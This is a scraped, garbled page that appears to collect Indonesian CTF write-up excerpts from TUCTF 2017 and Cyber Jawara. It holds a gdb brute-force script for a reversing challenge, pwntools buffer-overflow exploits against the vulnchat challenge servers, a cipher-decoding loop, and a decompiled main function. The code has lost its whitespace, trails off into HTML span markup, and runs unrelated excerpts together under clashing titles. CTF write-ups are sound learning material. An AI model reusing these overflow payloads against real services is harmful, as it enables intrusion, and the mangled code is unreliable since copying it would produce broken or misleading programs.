TPCTF 2017 - Write up


TUCTF 2017 - Write up

gdb.execute("b 0x0000000000401c82")whileTrue:forcinchar_set:pattern=flag+c+"A"(55-len(flag))gdb.execute("r {}“.format(pattern))foriinrange(len(flag)):gdb.execute("c")rax=gdb.execute("p/x $rax",True,True).split()[-1]ifrax=="0x0":flag+=cif”}“inflag:print("Flag : %s"%(flag))exit(0)print("Curret Flag : %s"%(flag))sleep(1)breakprint("Pattern : %s"%(pattern))print("Nilai Rax : %s"%(rax))vuln=remote("vulnchat.tuCTF.com",4141)payload="A"20+p32(0x00007325)# overwrite with “%s"vuln.sendlineafter("Enter your username: “,payload)payload2="A"49+p32(0x804856b)vuln.sendlineafter(”: “,payload2)printvuln.recvall()flag="\x72"vuln2=remote("vulnchat2.tuCTF.com",4242)vuln2.sendlineafter("Enter your username: “,"AAAA")vuln2.recvuntil("AAAA: “)payload="A"*43+flagvuln2.send(payload)printvuln2.recv(1024)never=remote("neverending.tuCTF.com",12345)char_set="abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 !"#$%&'()*+,-./:;<=>?@[]^_`{|}~</span>s"defround1(char="A"):never.sendlineafter("text:“,char)enc_base=never.recvline().split("is “)[1]enc_msg=never.recvline().split("is “)[1]enc_msg=enc_msg.split(” decrypted?\n")[0]log.info("ENC BASE : -> {}“.format(enc_base))log.info("ENC MSG : -> {}“.format(enc_msg))cal=ord(char)-ord(enc_base[0])dec="“.join([chr(ord(b)+cal)forbinenc_msg])<span class="n">non_printable</span> <span class="o">=</span> <span class="p">[</span> <span class="nb">chr</span><span class="p">(</span><span class="nb">ord</span><span class="p">(</span><span class="n">z</span><span class="p">))</span> <span class="k">for</span> <span class="n">z</span> <span class="ow">in</span> <span class="n">dec</span> <span class="k">if</span> <span class="n">z</span> <span class="ow">not</span> <span class="ow">in</span> <span class="n">char_set</span><span class="p">]</span> <span class="n">printable</span> <span class="o">=</span> <span class="s">""</span><span class="o">.

TUCTF 2017 - Writeup

Reversing 200 (Unknown) Diberikan file ELF 64 bit stripped. Berikut hasil disassembly fungsi main signed __int64 __fastcall main(int a1, char **a2, char **a3) { signed __int64 result; // rax@2 unsigned int i; // [sp+14h] [bp-Ch]@5 char *v5; // [sp+18h] [bp-8h]@5 if ( a1 == 2 ) { if ( strlen(a2[1]) == 56 ) { v5 = a2[1]; for ( i = 0; i < 0x38; ++i ) { if ( (unsigned int)sub_401E90((__int64)v5, i) ) dword_603084 = 1; } if ( dword_603084 ) puts("Nope.

Write Up Cyber Jawara 2017
